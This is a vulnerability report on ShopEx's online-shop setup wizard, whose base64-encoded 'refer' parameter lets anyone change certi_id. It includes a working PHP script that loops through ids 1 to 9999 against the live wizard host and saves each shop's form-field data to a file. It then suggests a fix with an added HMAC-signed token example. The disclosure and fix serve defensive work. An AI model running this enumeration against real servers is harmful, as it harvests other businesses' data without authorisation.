Brief description:
A defect in a ShopEx interface allows enumerating every site that runs the software
Details:
The problem is in the ShopEx online-shop setup wizard page
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
The refer parameter base64-decodes to {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
Changing certi_id lets us enumerate every site that uses the ShopEx software. Base64 is a reversible encoding, not encryption, and the wizard trusts whatever certi_id it decodes from refer, so an attacker only has to decode the parameter, edit the id and re-encode it.
<?php
// Enumerate certi_id values against the ShopEx setup wizard and dump the
// text form fields it returns for every id the wizard recognises.

function ShowshopExD($cid) {
    $url = 'http://guide.ecos.shopex.cn/step2.php';
    // Rebuild the "refer" parameter with our own certi_id; callback_url is a dummy.
    $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
    // base64 output can contain '+', '/' and '=', so it must be URL-encoded.
    $url = $url.'?refer='.urlencode($refer);

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $result = curl_exec($ch);
    curl_close($ch);
    if ($result === false) {
        return;
    }
    // Convert to GB2312 so Chinese field values print readably on a Windows console.
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    // The wizard echoes the refer value back only when certi_id exists;
    // compare against false, because strpos() returns 0 for a match at offset 0.
    if (strpos($result, $refer) !== false) {
        $fp = fopen("c:/shopEx.txt", 'ab'); // append results to a file
        preg_match_all('/<input\stype="text"(.*?)\/>/', $result, $value);
        foreach ($value[1] as $key) {
            // Pull name and value out of each text input.
            if (!preg_match('/name="(.*?)"(.*?)value="(.*?)"/', trim($key), $res)) {
                continue;
            }
            $col = $res[1].':'.$res[3]."\r\n";
            echo $col;
            fwrite($fp, $col);
        }
        echo '--------------------------------'."\r\n";
        fclose($fp);
    }
    flush();
}

for ($i = 1; $i < 10000; $i++) { // walk the certi_id space
    ShowshopExD($i);
}
?>
Proof of vulnerability:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
Suggested fix: switch the refer parameter to a different encryption scheme. A different encoding on its own is not enough: the wizard has to check that the certi_id it receives actually belongs to the caller, for instance by signing the token server-side and verifying the signature before the id is used; any scheme the client can reproduce is just base64 again.
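As an added example (not ShopEx code, and not the reporter's script), this is what a signed refer token looks like next to the unsigned pattern the report describes. The HMAC secret, the function names and the demo values are hypothetical; the point is that a client who edits certi_id inside the payload, exactly as the enumeration script above does, no longer gets a token the server will accept.

```php
<?php
// Added example (not ShopEx code): sign the "refer" token so its certi_id
// cannot be edited client-side, and reject anything whose signature does
// not verify. Names, the secret and the demo values are hypothetical.

// URL-safe base64 without padding: survives a query string without urlencode().
function b64url_encode(string $bin): string {
    return rtrim(strtr(base64_encode($bin), '+/', '-_'), '=');
}

function b64url_decode(string $txt) {
    return base64_decode(strtr($txt, '-_', '+/'), true); // strict: false on bad input
}

// What the report describes: the wizard accepts any base64 the client sends.
function parse_refer_unsigned(string $token) {
    $claims = json_decode(base64_decode($token), true);
    return is_array($claims) ? $claims : null;
}

// Issued server-side, after the shop owner has authenticated and the server
// has looked up *their* certi_id (never one supplied by the client).
function make_refer(array $claims, string $secret): string {
    $payload = b64url_encode(json_encode($claims));
    $sig     = b64url_encode(hash_hmac('sha256', $payload, $secret, true));
    return $payload . '.' . $sig;
}

// Called by the wizard (step2.php in the report) before certi_id is used for anything.
function parse_refer_signed(string $token, string $secret) {
    $parts = explode('.', $token);
    if (count($parts) !== 2) {
        return null;
    }
    [$payload, $sig] = $parts;
    $expected = b64url_encode(hash_hmac('sha256', $payload, $secret, true));
    if (!hash_equals($expected, $sig)) {   // constant-time comparison
        return null;
    }
    $json   = b64url_decode($payload);
    $claims = ($json === false) ? null : json_decode($json, true);
    if (!is_array($claims) || !isset($claims['certi_id'], $claims['callback_url'], $claims['exp'])) {
        return null;
    }
    if ($claims['exp'] < time()) {          // short-lived token limits replay
        return null;
    }
    return $claims;
}

// --- demo (constructed values) -------------------------------------------
$secret = 'hypothetical-server-secret-rotate-me';   // assumption: kept server-side only
$issued = make_refer(
    ['certi_id' => 1051, 'callback_url' => 'http://www.a.com/', 'exp' => time() + 300],
    $secret
);
var_dump(parse_refer_signed($issued, $secret));      // the claims, certi_id 1051

// Attacker takes the issued token, decodes the payload, bumps certi_id and
// re-encodes it while keeping the old signature.
[$payload, $sig] = explode('.', $issued);
$claims = json_decode(b64url_decode($payload), true);
$claims['certi_id'] = 1052;
$tampered = b64url_encode(json_encode($claims)) . '.' . $sig;

var_dump(parse_refer_signed($tampered, $secret));    // rejected: signature no longer matches
var_dump(parse_refer_unsigned(base64_encode(json_encode($claims))));  // accepted: the unsigned wizard trusts it
?>
```

The signature only closes the hole if the token is minted from the authenticated shop's own record; a server that signs whatever certi_id the client asks for has simply moved the enumeration to the issuing endpoint. For the same reason callback_url belongs in the server's record of the shop, not in client input. json_encode escapes slashes by default, which is why the payload ends up in the same "http:\/\/..." form the report shows.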